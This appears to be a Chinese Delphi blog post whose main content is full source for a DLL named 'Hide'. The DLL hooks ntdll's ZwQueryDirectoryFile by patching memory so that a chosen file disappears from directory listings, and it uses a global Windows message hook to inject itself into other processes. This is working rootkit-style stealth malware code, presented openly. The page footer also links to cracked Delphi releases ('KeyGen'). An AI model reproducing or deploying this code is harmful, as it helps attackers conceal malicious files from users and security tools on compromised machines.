library Hide;
uses
Windows,
Native,Dialogs,SysUtils;
const
FileDirectoryInformation = 1;
FileFullDirectoryInformation = 2;
FileBothDirectoryInformation = 3;
FileNamesInformation = 12;
STATUS_NO_SUCH_FILE = $C000000F;
type
OldCode = packed record
One: dword;
two: word;
end;
type
FILE_DIRECTORY_INFORMATION = packed record
NextEntryOffset: ULONG;
Unknown: ULONG;
CreationTime,
LastAccessTime,
LastWriteTime,
ChangeTime,
EndOfFile,
AllocationSize: int64;
FileAttributes: ULONG;
FileNameLength: ULONG;
FileName: PWideChar;
end;
PFILE_DIRECTORY_INFORMATION=^FILE_DIRECTORY_INFORMATION;
type
FILE_FULL_DIRECTORY_INFORMATION = packed record
NextEntryOffset: ULONG;
Unknown: ULONG;
CreationTime,
LastAccessTime,
LastWriteTime,
ChangeTime,
EndOfFile,
AllocationSize: int64;
FileAttributes: ULONG;
FileNameLength: ULONG;
EaInformationLength: ULONG;
FileName: PWideChar;
end;
type
FILE_BOTH_DIRECTORY_INFORMATION = packed record
NextEntryOffset: ULONG;
Unknown: ULONG;
CreationTime,
LastAccessTime,
LastWriteTime,
ChangeTime,
EndOfFile,
AllocationSize: int64;
FileAttributes: ULONG;
FileNameLength: ULONG;
EaInformationLength: ULONG;
AlternateNameLength: WORD;
AlternateName: array [0..11] of WideChar;
FileName: WideChar;
end;
PFILE_BOTH_DIRECTORY_INFORMATION=^FILE_BOTH_DIRECTORY_INFORMATION;
type
FILE_NAMES_INFORMATION = packed record
NextEntryOffset: ULONG;
Unknown: ULONG;
FileNameLength: ULONG;
FileName: PWideChar;
end;
far_jmp = packed record
PuhsOp: byte;
PushArg: pointer;
RetOp: byte;
end;
var
JmpZwq: far_jmp;
OldZwq: OldCode;
PtrZwq: pointer;
Function ZwQueryDirectoryFile(FileHandle: dword;
Event: dword;
ApcRoutine: pointer;
ApcContext: pointer;
IoStatusBlock: pointer;
FileInformation: pointer;
FileInformationLength: dword;
FileInformationClass: dword;
ReturnSingleEntry: bool;
FileName: PUnicodeString;
RestartScan: bool): NTStatus;
stdcall; external 'ntdll.dll';
Function TrueZwQueryDirectoryFile(FileHandle: dword;
Event: dword;
ApcRoutine: pointer;
ApcContext: pointer;
IoStatusBlock: pointer;
FileInformation: pointer;
FileInformationLength: dword;
FileInformationClass: dword;
ReturnSingleEntry: bool;
FileName: PUnicodeString;
RestartScan: bool): NTStatus;
stdcall;
var
Written: dword;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
@OldZwq, SizeOf(OldCode), Written);
Result := ZwQueryDirectoryFile(FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
FileInformationLength,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan);
WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
@JmpZwq, SizeOf(far_jmp), Written);
end;
function NewZwQueryDirectoryFile (FileHandle: dword;
Event: dword;
ApcRoutine: pointer;
ApcContext: pointer;
IoStatusBlock: pointer;
FileInformation: pointer;
FileInformationLength: dword;
FileInformationClass: dword;
ReturnSingleEntry: bool;
FileName: PUnicodeString;
RestartScan: bool): NTStatus; stdcall;
var
lNamePWC: PWideChar;
lNameW, HideFileNameW: WideString;
lPrevPt, lPt: Pointer;
lNextEntryOffset: ULONG;
lSz: ULONG;
begin
Result := TrueZwQueryDirectoryFile( FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
FileInformationLength,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan );
if not (FileInformationClass in [ FileDirectoryInformation,
FileFullDirectoryInformation,
FileBothDirectoryInformation,
FileNamesInformation]) or
(Result = STATUS_NO_SUCH_FILE) or
(FileInformationLength = 0) then Exit;
lPt := FileInformation;
lPrevPt := nil;
repeat
lNextEntryOffset := ULONG(lPt^);
case FileInformationClass of
FileDirectoryInformation:
begin
lSz := FILE_DIRECTORY_INFORMATION(lPt^).FileNameLength;
lNamePWC := @FILE_DIRECTORY_INFORMATION(lPt^).FileName;
end;
FileFullDirectoryInformation:
begin
lSz := FILE_FULL_DIRECTORY_INFORMATION(lPt^).FileNameLength;
lNamePWC := @FILE_FULL_DIRECTORY_INFORMATION(lPt^).FileName;
end;
FileBothDirectoryInformation:
begin
lSz := FILE_BOTH_DIRECTORY_INFORMATION(lPt^).FileNameLength;
lNamePWC := @FILE_BOTH_DIRECTORY_INFORMATION(lPt^).FileName;
end;
FileNamesInformation:
begin
lSz := FILE_NAMES_INFORMATION(lPt^).FileNameLength;
lNamePWC := @FILE_NAMES_INFORMATION(lPt^).FileName;
end;
end;
SetLength( lNameW, lSz div 2);
Move( lNamePWC^, lNameW[1], lSz );
(* Checkin for our file name *)
if lstrcmpiW( @HideFileNameW[1], @lNameW[1] ) = 0 then
begin //Founded :)
if lPt = FileInformation then
begin // begin
//This code part not tested, may have bugs :b
if lNextEntryOffset <> 0 then
begin
lPt := Pointer(ULONG(lPt)+lNextEntryOffset);
Move( lPt^, FileInformation^, FileInformationLength - lNextEntryOffset );
end
else
Result := STATUS_NO_SUCH_FILE;
end
//this part works fine
else
if lNextEntryOffset <> 0 then
begin // center
ULONG(lPrevPt^) := ULONG(lPrevPt^) + lNextEntryOffset;
end
else //end
begin
ULONG(lPrevPt^) := 0;
end;
Break; //
end;
lPrevPt := lPt;
lPt := Pointer(ULONG(lPt)+lNextEntryOffset);
until lNextEntryOffset = 0;
end;
Procedure SetHook();
var
Bytes: dword;
begin
PtrZwq := GetProcAddress(GetModuleHandle('ntdll.dll'),
'ZwQueryDirectoryFile');
ReadProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
JmpZwq.PuhsOp := $68;
JmpZwq.PushArg := @NewZwQueryDirectoryFile;
JmpZwq.RetOp := $C3;
WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @JmpZwq, SizeOf(far_jmp), Bytes);
end;
Procedure Unhook();
var
Bytes: dword;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
end;
Function MessageProc(code : integer; wParam : word;
lParam : longint) : longint; stdcall;
begin
CallNextHookEx(0, Code, wParam, lparam);
Result := 0;
end;
Procedure SetGlobalHookProc();
begin
SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0);
Sleep(INFINITE);
end;
//
Procedure SetGlobalHook();
var
hMutex: dword;
TrId: dword;
begin
hMutex := CreateMutex(nil, false, 'ProcHideHook');
if GetLastError = 0 then
CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId) else
CloseHandle(hMutex);
end;
procedure DLLEntryPoint(dwReason: DWord);
begin
case dwReason of
DLL_PROCESS_ATTACH: begin
SetGlobalHook();
SetHook();
end;
DLL_PROCESS_DETACH: begin
Unhook();
end;
end;
end;
begin
DllProc := @DLLEntryPoint;
DLLEntryPoint(DLL_PROCESS_ATTACH);
end.
- 本文由 Pony 发表于 2020-04-1120:21:38
编程工具
RADStudio-11-6259(Delphi RADStudio-11)
The KeyGen Please Wait a Moment We Wil Coming Soon! 技术手册 感谢大神们一路辛苦努力支持...
编程工具
Embarcadero.Delphi.10.4.2.v27.0.40680.4203.Lite.v16.2
Embarcadero.Delphi.10.4.2.v27.0.40680.4203.Lite.v16.2 ----------------------------------------------...
编程工具
Delphi.10.4.1.v27.0.38860.1461.Lite.v16.1
Embarcadero.Delphi.10.4.1.v27.0.38860.1461.Lite.v16.1 ----------------------------------------------...
经典博文
苹果体 Delphi 10.4 新功能介绍
1.同一个功能,同一套代码,桌面移动端开发真可以傻傻分不清! 2.记录也可以托管,你现在可以定义他的来龙去脉了! https://community.idera.com/developer-tools...
发表评论
2020-08-29 16:43 1F
登录回复
这个怎么用?看着像dll注入
2020-08-29 16:45 B1
登录回复
@ 5460whb@sina.com Native 这个单元出没有找到,哪个版本的Delphi?